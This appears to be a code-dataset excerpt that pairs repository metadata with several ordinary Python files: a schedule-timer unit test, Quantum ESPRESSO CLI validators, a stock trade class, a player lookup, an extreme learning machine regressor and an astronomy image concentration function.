| 27.875 | 80 | 0.591031 | 138 | 1,115 | 4.775362 | 0.775362 | 0.036419 | 0.045524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064407 | 0.206278 | 1,115 | 39 | 81 | 28.589744 | 0.680226 | 0.577578 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47226c18564ce8f55f4fdb06c8ed33bfda9ac9a4 | 1,026 | py | Python | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
] | null | null | null | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
] | 16 | 2017-10-12T09:10:28.000Z | 2021-05-20T20:30:15.000Z | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
] | 1 | 2021-06-18T18:23:36.000Z | 2021-06-18T18:23:36.000Z | import unittest
import datetime
from app import ScheduleHandler
class TestScheduleHandler(unittest.TestCase):
def test_timer(self):
class PartialIrcBot(ScheduleHandler):
pass
t = PartialIrcBot()
df = "%d/%m/%Y %H:%M:%S"
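        # 9-13 October 2017 fall on Monday-Friday, so the timer should fire
        # only between 09:00 and 17:59.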
for d in [9, 10, 11, 12, 13]:
d_str = "{}/10/2017".format(d)
for h in range(24):
h_str = "{}:00:00".format(str(h).zfill(2))
dt = datetime.datetime.strptime("{d} {h}".format(d=d_str, h=h_str), df)
if h < 9 or h >= 18:
self.assertFalse(t.timer_should_execute(dt))
else:
self.assertTrue(t.timer_should_execute(dt))
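        # 14-15 October 2017 fall on a weekend, so the timer should never fire.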
for d in [14, 15]:
d_str = "{}/10/2017".format(d)
for h in range(24):
h_str = "{}:00:00".format(str(h).zfill(2))
dt = datetime.datetime.strptime("{d} {h}".format(d=d_str, h=h_str), df)
self.assertFalse(t.timer_should_execute(dt))
| 31.090909 | 87 | 0.517544 | 138 | 1,026 | 3.73913 | 0.355072 | 0.031008 | 0.069767 | 0.110465 | 0.567829 | 0.527132 | 0.527132 | 0.387597 | 0.387597 | 0.387597 | 0 | 0.061493 | 0.334308 | 1,026 | 32 | 88 | 32.0625 | 0.693997 | 0 | 0 | 0.416667 | 0 | 0 | 0.065302 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.041667 | false | 0.041667 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47240275a74da00053f650b9e1be9d450a7288f2 | 6,150 | py | Python | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | aiida_quantumespresso/cli/utils/validate.py | lin-cp/aiida-quantumespresso | 55f2bc8c137a69be24709a119bc285c700997907 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Utility functions for validation of command line interface parameter inputs."""
from aiida.cmdline.utils import decorators
from aiida.common import exceptions
import click
@decorators.with_dbenv()
def validate_kpoints_mesh(ctx, param, value):
"""Command line option validator for a kpoints mesh tuple.
The value should be a tuple of three positive integers out of which a KpointsData object will be created with a mesh
equal to the tuple.
:param ctx: internal context of the click.command
:param param: the click Parameter, i.e. either the Option or Argument to which the validator is hooked up
:param value: a tuple of three positive integers
:returns: a KpointsData instance
"""
# pylint: disable=unused-argument
from aiida.orm import KpointsData
if not value:
return None
if any(not isinstance(integer, int) for integer in value) or any(int(i) <= 0 for i in value):
raise click.BadParameter('all values of the tuple should be positive greater than zero integers')
try:
kpoints = KpointsData()
kpoints.set_kpoints_mesh(value)
except ValueError as exception:
raise click.BadParameter(f'failed to create a KpointsData mesh out of {value}\n{exception}')
return kpoints
@decorators.with_dbenv()
def validate_hubbard_parameters(structure, parameters, hubbard_u=None, hubbard_v=None, hubbard_file_pk=None):
"""Validate Hubbard input parameters and update the parameters input node accordingly.
If a valid hubbard_file_pk is provided, the node will be loaded and returned.
:param structure: the StructureData node that will be used in the inputs
:param parameters: the Dict node that will be used in the inputs
:param hubbard_u: the Hubbard U inputs values from the cli
:param hubbard_v: the Hubbard V inputs values from the cli
:param hubbard_file_pk: a pk referencing a SinglefileData with Hubbard parameters
:returns: the loaded SinglefileData node with Hubbard parameters if valid pk was defined, None otherwise
:raises ValueError: if the input is invalid
"""
from aiida.orm import SinglefileData, load_node
if len([value for value in [hubbard_u, hubbard_v, hubbard_file_pk] if value]) > 1:
raise ValueError('the hubbard_u, hubbard_v and hubbard_file_pk options are mutually exclusive')
hubbard_file = None
if hubbard_file_pk:
try:
hubbard_file = load_node(pk=hubbard_file_pk)
except exceptions.NotExistent:
            raise ValueError(f'{hubbard_file_pk} is not a valid pk')
else:
if not isinstance(hubbard_file, SinglefileData):
                raise ValueError(f'Node<{hubbard_file_pk}> is not a SinglefileData but {type(hubbard_file)}')
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 2
parameters['SYSTEM']['hubbard_parameters'] = 'file'
elif hubbard_v:
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 2
parameters['SYSTEM']['hubbard_parameters'] = 'input'
parameters['SYSTEM']['hubbard_v'] = []
for value in hubbard_v:
parameters['SYSTEM']['hubbard_v'].append(value)
elif hubbard_u:
structure_kinds = structure.get_kind_names()
hubbard_kinds = [value[0] for value in hubbard_u]
if not set(hubbard_kinds).issubset(structure_kinds):
raise ValueError('kinds in the specified Hubbard U is not a strict subset of the structure kinds')
parameters['SYSTEM']['lda_plus_u'] = True
parameters['SYSTEM']['lda_plus_u_kind'] = 0
parameters['SYSTEM']['hubbard_u'] = {}
for kind, value in hubbard_u:
parameters['SYSTEM']['hubbard_u'][kind] = value
return hubbard_file
def validate_starting_magnetization(structure, parameters, starting_magnetization=None):
"""Validate starting magnetization parameters and update the parameters input node accordingly.
:param structure: the StructureData node that will be used in the inputs
:param parameters: the Dict node that will be used in the inputs
:param starting_magnetization: the starting magnetization inputs values from the cli
:raises ValueError: if the input is invalid
"""
if not starting_magnetization:
return
structure_kinds = structure.get_kind_names()
magnetization_kinds = [kind for kind, magnetization in starting_magnetization]
if not set(magnetization_kinds).issubset(structure_kinds):
raise ValueError('kinds in the specified starting magnetization is not a strict subset of the structure kinds')
parameters['SYSTEM']['nspin'] = 2
parameters['SYSTEM']['starting_magnetization'] = {}
for kind, magnetization in starting_magnetization:
parameters['SYSTEM']['starting_magnetization'][kind] = magnetization
def validate_smearing(parameters, smearing=None):
"""Validate smearing parameters and update the parameters input node accordingly.
:param parameters: the Dict node that will be used in the inputs
:param smearing: a tuple of a string and float corresponding to type of smearing and the degauss value
:raises ValueError: if the input is invalid
"""
if not any(smearing):
return
valid_smearing_types = {
'gaussian': ['gaussian', 'gauss'],
'methfessel-paxton': ['methfessel-paxton', 'm-p', 'mp'],
'marzari-vanderbilt': ['marzari-vanderbilt', 'cold', 'm-v', 'mv'],
'fermi-dirac': ['fermi-dirac', 'f-d', 'fd'],
}
for _, options in valid_smearing_types.items():
if smearing[0] in options:
break
else:
raise ValueError(
f'the smearing type "{smearing[0]}" is invalid, choose from {", ".join(list(valid_smearing_types.keys()))}'
)
if not isinstance(smearing[1], float):
raise ValueError('the smearing value should be a float')
parameters['SYSTEM']['occupations'] = 'smearing'
parameters['SYSTEM']['smearing'] = smearing[0]
parameters['SYSTEM']['degauss'] = smearing[1]
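# A quick illustration of validate_smearing (hypothetical values, not part of
# the original module): 'cold' is an alias of marzari-vanderbilt, so it is
# accepted and written back into the parameters dictionary.
def _smearing_example():
    parameters = {'SYSTEM': {}}
    validate_smearing(parameters, ('cold', 0.02))
    assert parameters['SYSTEM'] == {
        'occupations': 'smearing', 'smearing': 'cold', 'degauss': 0.02
    }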
| 39.423077 | 120 | 0.696585 | 803 | 6,150 | 5.215442 | 0.220423 | 0.068768 | 0.027937 | 0.032951 | 0.344556 | 0.31638 | 0.256208 | 0.231614 | 0.219198 | 0.175263 | 0 | 0.002685 | 0.212683 | 6,150 | 155 | 121 | 39.677419 | 0.862247 | 0.30374 | 0 | 0.180723 | 0 | 0.012048 | 0.265478 | 0.026259 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048193 | false | 0 | 0.060241 | 0 | 0.168675 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4725bdc2094e9f435b0639c37370a8daffc3e956 | 2,197 | py | Python | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | src/Utils/Trade.py | andrebask/TradingMate | 1b07c70cb6d911201c6983942353b3d70f1fc479 | [
"MIT"
] | null | null | null | from enum import Enum
import os
import sys
import inspect
import logging
import datetime
currentdir = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
from Utils.Utils import Actions
class Trade():
def __init__(self, date_string, action, quantity, symbol, price, fee, sdr):
try:
self.date = datetime.datetime.strptime(date_string, '%d/%m/%Y')
if not isinstance(action, Actions):
raise ValueError("Invalid action")
self.action = action
self.quantity = quantity
self.symbol = symbol
self.price = price
self.fee = fee
self.sdr = sdr
self.total = self.__compute_total()
except Exception as e:
logging.error(e)
raise ValueError("Invalid argument")
def to_dict(self):
return {
'date': self.date.strftime('%d/%m/%Y'),
'action': self.action.name,
'quantity': self.quantity,
'symbol': self.symbol,
'price': self.price,
'fee': self.fee,
'stamp_duty': self.sdr
}
@staticmethod
def from_dict(item):
if any(['date' not in item, 'action' not in item, 'quantity' not in item, 'symbol' not in item, 'price' not in item, 'fee' not in item, 'stamp_duty' not in item]):
raise ValueError('item not well formatted')
return Trade(item['date'], Actions[item['action']], item['quantity'],
item['symbol'], float(item['price']), float(item['fee']), float(item['stamp_duty']))
def __compute_total(self):
if self.action in (Actions.DEPOSIT, Actions.WITHDRAW, Actions.DIVIDEND):
return self.quantity
elif self.action == Actions.BUY:
cost = (self.price / 100) * self.quantity
return cost + self.fee + ((cost * self.sdr) / 100)
elif self.action == Actions.SELL:
cost = (self.price / 100) * self.quantity
total = cost + self.fee + ((cost * self.sdr) / 100)
return total * -1
return 0
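    # Worked example (hypothetical values): an Actions.BUY trade with
    # quantity=100, price=150.0 (pence), fee=11.95 and sdr=0.5 (%) gives
    # cost = (150.0 / 100) * 100 = 150.0 and
    # total = 150.0 + 11.95 + (150.0 * 0.5) / 100 = 162.70.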
| 34.873016 | 171 | 0.578971 | 262 | 2,197 | 4.790076 | 0.282443 | 0.027888 | 0.050199 | 0.033466 | 0.084462 | 0.084462 | 0.039841 | 0 | 0 | 0 | 0 | 0.009702 | 0.296313 | 2,197 | 62 | 172 | 35.435484 | 0.80207 | 0 | 0 | 0.037037 | 0 | 0 | 0.088757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.12963 | 0.018519 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472734dfa2d0143ee41b2ebd5310df9144aa63b2 | 497 | py | Python | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | 3 | 2017-06-15T17:42:20.000Z | 2021-04-04T14:11:21.000Z | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | null | null | null | scorebot/players.py | cloudlinux/scorebot | e2a105a605e17bcdeee8493efaa66b29c434ca80 | [
"MIT"
] | 2 | 2017-02-14T08:05:25.000Z | 2017-03-11T08:26:35.000Z | from collections import namedtuple
from config.config import CONF
PlayerInfo = namedtuple('PlayerInfo', ['team', 'slack_name'])
class PlayerNotFound(Exception):
def __init__(self, player):
msg = "Player '{}' cannot be found in player-to-team " \
"mapping.".format(player)
super(PlayerNotFound, self).__init__(msg)
def player_info(player):
try:
return PlayerInfo(*CONF['players'][player])
except KeyError:
raise PlayerNotFound(player)
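# Usage sketch (assumes CONF['players'] maps player names to (team,
# slack_name) pairs, e.g. {'alice': ('red', '@alice')}; values are
# hypothetical):
#     player_info('alice')   # -> PlayerInfo(team='red', slack_name='@alice')
#     player_info('nobody')  # -> raises PlayerNotFound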
| 26.157895 | 64 | 0.672032 | 54 | 497 | 6 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209256 | 497 | 18 | 65 | 27.611111 | 0.824427 | 0 | 0 | 0 | 0 | 0 | 0.171026 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.153846 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472b0a2f2e9b3fe1b62227a85d0dd389ed036ca6 | 18,590 | py | Python | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 84 | 2015-03-08T07:39:47.000Z | 2022-03-06T03:41:23.000Z | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 11 | 2015-09-10T04:01:26.000Z | 2021-06-01T23:04:46.000Z | elm/elmr.py | ShubhamDiwan/elm | bf33f2498551fba3b2fd42d982feb0d22c031a71 | [
"BSD-3-Clause"
] | 70 | 2015-03-30T10:20:14.000Z | 2022-03-06T03:41:24.000Z | # -*- coding: utf-8 -*-
"""
This file contains ELMKernel classes and all developed methods.
"""
# Python2 support
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from .mltools import *
import numpy as np
import optunity
import ast
import sys
if sys.version_info < (3, 0):
import ConfigParser as configparser
else:
import configparser
try:
from scipy.special import expit
except ImportError:
_SCIPY = 0
else:
_SCIPY = 1
# Find configuration file
from pkg_resources import Requirement, resource_filename
_ELMR_CONFIG = resource_filename(Requirement.parse("elm"), "elm/elmr.cfg")
class ELMRandom(MLTools):
"""
A Python implementation of ELM Random Neurons defined by Huang[1].
    An ELM is a single-hidden layer feedforward network (SLFN) proposed by
    Huang back in 2006; in 2012 the author revised his previous work and
    introduced the concept of using kernel functions.
    This implementation currently accepts both methods proposed in 2012,
    random neurons and kernel functions, to estimate classifier/regression
    functions.
Let the dimensionality "d" of the problem be the sum of "t" size (number of
targets per pattern) and "f" size (number of features per pattern).
So, d = t + f
The data will be set as Pattern = (Target | Features).
If database has *N* patterns, its size follows *Nxd*.
Note:
[1] Paper reference: Huang, 2012, "Extreme Learning Machine for
Regression and Multiclass Classification"
Attributes:
input_weight (numpy.ndarray): a random matrix (*Lxd-1*) needed
to calculate H(**x**).
        output_weight (numpy.ndarray): a column vector (*Lx1*) calculated
            after training, representing :math:`\\beta`.
bias_of_hidden_neurons (numpy.ndarray): a random column vector
(*Lx1*) needed to calculate H(**x**).
param_function (str): function that will be used for training.
param_c (float): regularization coefficient (*C*) used for training.
param_l (list of float): number of neurons that will be used for
training.
param_opt (bool): a boolean used to calculate an optimization
when number of training patterns are much larger than neurons
(N >> L).
Other Parameters:
regressor_name (str): The name of classifier/regressor.
available_functions (list of str): List with all available
functions.
default_param_function (str): Default function if not set at
class constructor.
default_param_c (float): Default parameter c value if not set at
class constructor.
default_param_l (integer): Default number of neurons if not set at
class constructor.
default_param_opt (bool): Default boolean optimization flag.
Note:
* **regressor_name**: defaults to "elmr".
* **default_param_function**: defaults to "sigmoid".
* **default_param_c**: defaults to 2 ** -6.
* **default_param_l**: defaults to 500.
* **default_param_opt**: defaults to False.
"""
def __init__(self, params=[]):
"""
Class constructor.
Arguments:
params (list): first argument (*str*) is an available function,
second argument (*float*) is the coefficient *C* of
regularization, the third is the number of hidden neurons
and the last argument is an optimization boolean.
Example:
>>> import elm
>>> params = ["sigmoid", 1, 500, False]
>>> elmr = elm.ELMRandom(params)
"""
super(self.__class__, self).__init__()
self.available_functions = ["sigmoid", "multiquadric"]
self.regressor_name = "elmr"
self.default_param_function = "sigmoid"
self.default_param_c = 2 ** -6
self.default_param_l = 500
self.default_param_opt = False
self.input_weight = []
self.output_weight = []
self.bias_of_hidden_neurons = []
# Initialized parameters values
if not params:
self.param_function = self.default_param_function
self.param_c = self.default_param_c
self.param_l = self.default_param_l
self.param_opt = self.default_param_opt
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
# ########################
# Private Methods
# ########################
def __set_random_weights(self, number_of_hidden_nodes,
number_of_attributes):
"""
Initialize random values to calculate function
Arguments:
number_hidden_nodes (int): number of neurons.
number_of_attributes (int): number of features.
"""
self.input_weight = np.random.rand(number_of_hidden_nodes,
number_of_attributes) * 2 - 1
self.bias_of_hidden_neurons = np.random.rand(number_of_hidden_nodes, 1)
def __map_hidden_layer(self, function_type, number_hidden_nodes, data):
"""
Map argument "data" to the hidden layer feature space.
Arguments:
function_type (str): function to map input data to feature
space.
number_hidden_nodes (int): number of hidden neurons.
data (numpy.ndarray): data to be mapped to feature space.
Returns:
numpy.ndarray: mapped data.
"""
number_of_data = data.shape[0]
if function_type == "sigmoid" or function_type == "sig" or \
function_type == "sin" or function_type == "sine" or \
function_type == "hardlim" or \
function_type == "tribas":
temp = np.dot(self.input_weight, data.conj().T)
bias_matrix = np.tile(self.bias_of_hidden_neurons,
number_of_data)
temp = temp + bias_matrix
elif function_type == "mtquadric" or function_type == "multiquadric":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = temp.conj().T + \
np.tile(self.bias_of_hidden_neurons ** 2, number_of_data)
elif function_type == "gaussian" or function_type == "rbf":
temph1 = np.tile(np.sum(data ** 2, axis=1).reshape(-1, 1),
number_hidden_nodes)
temph2 = \
np.tile(np.sum(self.input_weight ** 2, axis=1).reshape(-1, 1),
number_of_data)
temp = temph1 + temph2.conj().T \
- 2 * np.dot(data, self.input_weight.conj().T)
temp = \
np.multiply(temp.conj().T, np.tile(self.bias_of_hidden_neurons,
number_of_data))
else:
print("Error: Invalid function type")
return
if function_type == "sigmoid" or function_type == "sig":
if _SCIPY:
h_matrix = expit(temp)
else:
h_matrix = 1 / (1 + np.exp(-temp))
elif function_type == "sine" or function_type == "sin":
h_matrix = np.sin(temp)
elif function_type == "mtquadric" or function_type == "multiquadric":
h_matrix = np.sqrt(temp)
elif function_type == "gaussian" or function_type == "rbf":
h_matrix = np.exp(temp)
else:
print("Error: Invalid function type")
return
return h_matrix
def _local_train(self, training_patterns, training_expected_targets,
params):
# If params not provided, uses initialized parameters values
if not params:
pass
else:
self.param_function = params[0]
self.param_c = params[1]
self.param_l = params[2]
self.param_opt = params[3]
number_of_attributes = training_patterns.shape[1]
self.__set_random_weights(self.param_l, number_of_attributes)
h_train = self.__map_hidden_layer(self.param_function, self.param_l,
training_patterns)
# If N >>> L, param_opt should be True
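        # With H of shape (L x N) as built by __map_hidden_layer, the
        # optimized branch inverts the L x L matrix (I/C + H H^T), which is
        # cheaper when N >> L, while the default branch inverts the N x N
        # matrix (I/C + H^T H); both yield the regularized least-squares
        # output weights of Huang (2012).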
if self.param_opt:
self.output_weight = np.linalg.solve(
(np.eye(h_train.shape[0]) / self.param_c) +
np.dot(h_train, h_train.conj().T),
np.dot(h_train, training_expected_targets))
else:
self.output_weight = np.dot(h_train, np.linalg.solve(
((np.eye(h_train.shape[1]) / self.param_c) + np.dot(
h_train.conj().T, h_train)),
training_expected_targets))
training_predicted_targets = np.dot(h_train.conj().T,
self.output_weight)
return training_predicted_targets
def _local_test(self, testing_patterns, testing_expected_targets,
predicting):
h_test = self.__map_hidden_layer(self.param_function, self.param_l,
testing_patterns)
testing_predicted_targets = np.dot(h_test.conj().T, self.output_weight)
return testing_predicted_targets
# ########################
# Public Methods
# ########################
def search_param(self, database, dataprocess=None, path_filename=("", ""),
save=False, cv="ts", of="rmse", f=None, eval=50):
"""
Search best hyperparameters for classifier/regressor based on
optunity algorithms.
Arguments:
database (numpy.ndarray): a matrix containing all patterns
that will be used for training/testing at some
cross-validation method.
dataprocess (DataProcess): an object that will pre-process
database before training. Defaults to None.
path_filename (tuple): *TODO*.
save (bool): *TODO*.
cv (str): Cross-validation method. Defaults to "ts".
of (str): Objective function to be minimized at
optunity.minimize. Defaults to "rmse".
f (list of str): a list of functions to be used by the
search. Defaults to None, this set all available
functions.
eval (int): Number of steps (evaluations) to optunity algorithm.
Each set of hyperparameters will perform a cross-validation
method chosen by param cv.
Available *cv* methods:
- "ts" :func:`mltools.time_series_cross_validation()`
            Perform a time-series cross-validation suggested by Hyndman.
- "kfold" :func:`mltools.kfold_cross_validation()`
Perform a k-fold cross-validation.
Available *of* function:
- "accuracy", "rmse", "mape", "me".
See Also:
http://optunity.readthedocs.org/en/latest/user/index.html
"""
if f is None:
search_functions = self.available_functions
elif type(f) is list:
search_functions = f
else:
raise Exception("Invalid format for argument 'f'.")
print(self.regressor_name)
print("##### Start search #####")
config = configparser.ConfigParser()
if sys.version_info < (3, 0):
config.readfp(open(_ELMR_CONFIG))
else:
config.read_file(open(_ELMR_CONFIG))
best_function_error = 99999.9
temp_error = best_function_error
best_param_function = ""
best_param_c = 0
best_param_l = 0
for function in search_functions:
if sys.version_info < (3, 0):
elmr_c_range = ast.literal_eval(config.get("DEFAULT",
"elmr_c_range"))
neurons = config.getint("DEFAULT", "elmr_neurons")
else:
function_config = config["DEFAULT"]
elmr_c_range = ast.literal_eval(function_config["elmr_c_range"])
neurons = ast.literal_eval(function_config["elmr_neurons"])
param_ranges = [[elmr_c_range[0][0], elmr_c_range[0][1]]]
def wrapper_opt(param_c):
"""
Wrapper for optunity.
"""
if cv == "ts":
cv_tr_error, cv_te_error = \
time_series_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
elif cv == "kfold":
cv_tr_error, cv_te_error = \
kfold_cross_validation(self, database,
params=[function,
2 ** param_c,
neurons,
False],
number_folds=10,
dataprocess=dataprocess)
else:
raise Exception("Invalid type of cross-validation.")
if of == "accuracy":
util = 1 / cv_te_error.get_accuracy()
else:
util = cv_te_error.get(of)
# print("c:", param_c, "util: ", util)
return util
optimal_pars, details, _ = \
optunity.minimize(wrapper_opt,
solver_name="cma-es",
num_evals=eval,
param_c=param_ranges[0])
# Save best function result
if details[0] < temp_error:
temp_error = details[0]
if of == "accuracy":
best_function_error = 1 / temp_error
else:
best_function_error = temp_error
best_param_function = function
best_param_c = optimal_pars["param_c"]
best_param_l = neurons
if of == "accuracy":
print("Function: ", function,
" best cv value: ", 1/details[0])
else:
print("Function: ", function,
" best cv value: ", details[0])
# MLTools Attribute
self.cv_best_rmse = best_function_error
# elmr Attribute
self.param_function = best_param_function
self.param_c = best_param_c
self.param_l = best_param_l
print("##### Search complete #####")
self.print_parameters()
return None
def print_parameters(self):
"""
Print current parameters.
"""
print()
print("Regressor Parameters")
print()
print("Regularization coefficient: ", self.param_c)
print("Function: ", self.param_function)
print("Hidden Neurons: ", self.param_l)
print()
print("CV error: ", self.cv_best_rmse)
print("")
print()
def get_available_functions(self):
"""
Return available functions.
"""
return self.available_functions
def train(self, training_matrix, params=[]):
"""
Calculate output_weight values needed to test/predict data.
If params is provided, this method will use at training phase.
Else, it will use the default value provided at object
initialization.
Arguments:
training_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for training.
params (list): a list of parameters defined at
:func:`ELMKernel.__init__`
Returns:
:class:`Error`: training error object containing expected,
predicted targets and all error metrics.
Note:
Training matrix must have target variables as the first column.
"""
return self._ml_train(training_matrix, params)
def test(self, testing_matrix, predicting=False):
"""
Calculate test predicted values based on previous training.
Args:
testing_matrix (numpy.ndarray): a matrix containing all
patterns that will be used for testing.
predicting (bool): Don't set.
Returns:
:class:`Error`: testing error object containing expected,
predicted targets and all error metrics.
Note:
Testing matrix must have target variables as the first column.
"""
return self._ml_test(testing_matrix, predicting)
@copy_doc_of(MLTools._ml_predict)
def predict(self, horizon=1):
return self._ml_predict(horizon)
@copy_doc_of(MLTools._ml_train_iterative)
def train_iterative(self, database_matrix, params=[], sliding_window=168,
k=1):
return self._ml_train_iterative(database_matrix, params,
sliding_window, k)
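# End-to-end sketch (synthetic data, illustrative only; the first column of
# the matrix holds the target, as train/test expect):
#     >>> data = np.random.rand(100, 5)
#     >>> elmr = ELMRandom(["sigmoid", 2 ** -6, 50, False])
#     >>> tr_error = elmr.train(data[:80])
#     >>> te_error = elmr.test(data[80:])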
| 35.75 | 83 | 0.537063 | 1,969 | 18,590 | 4.858812 | 0.187913 | 0.024459 | 0.016097 | 0.011916 | 0.308874 | 0.271245 | 0.217519 | 0.186474 | 0.141319 | 0.141319 | 0 | 0.010515 | 0.375901 | 18,590 | 519 | 84 | 35.818882 | 0.814084 | 0.31603 | 0 | 0.312236 | 0 | 0 | 0.052376 | 0 | 0 | 0 | 0 | 0.003854 | 0 | 1 | 0.054852 | false | 0.004219 | 0.059072 | 0.008439 | 0.164557 | 0.084388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472d943521309da5bdb5ecbc1180c718f5245c0f | 1,561 | py | Python | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | ctapipe/image/concentration.py | nbiederbeck/ctapipe | cdd2fe5205bd2747d2846cfc751c51868b4a0bdd | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import astropy.units as u
from ..instrument import CameraGeometry
from ..containers import ConcentrationContainer
from .hillas import camera_to_shower_coordinates
from ..utils.quantities import all_to_value
__all__ = ["concentration_parameters"]
def concentration_parameters(geom: CameraGeometry, image, hillas_parameters):
"""
    Calculate concentration values.
    Concentrations are ratios of the amount of light in certain
    areas to the full intensity of the image.
    These features are useful for g/h separation and energy estimation.
"""
h = hillas_parameters
unit = h.x.unit
pix_x, pix_y, x, y, length, width, pixel_width = all_to_value(
geom.pix_x, geom.pix_y, h.x, h.y, h.length, h.width, geom.pixel_width, unit=unit
)
delta_x = pix_x - x
delta_y = pix_y - y
# take pixels within one pixel diameter from the cog
mask_cog = (delta_x ** 2 + delta_y ** 2) < pixel_width ** 2
conc_cog = np.sum(image[mask_cog]) / h.intensity
if hillas_parameters.width.value != 0:
# get all pixels inside the hillas ellipse
longi, trans = camera_to_shower_coordinates(
pix_x, pix_y, x, y, h.psi.to_value(u.rad)
)
mask_core = (longi ** 2 / length ** 2) + (trans ** 2 / width ** 2) <= 1.0
conc_core = image[mask_core].sum() / h.intensity
else:
conc_core = 0.0
concentration_pixel = image.max() / h.intensity
return ConcentrationContainer(
cog=conc_cog, core=conc_core, pixel=concentration_pixel
)
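# Usage sketch (assumes ctapipe's hillas_parameters helper; illustrative
# only):
#     from ctapipe.image import hillas_parameters
#     hillas = hillas_parameters(geom, image)
#     conc = concentration_parameters(geom, image, hillas)
#     conc.cog, conc.core, conc.pixel  # intensity fractions near the cog,
#                                      # inside the Hillas ellipse, and in
#                                      # the brightest pixel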
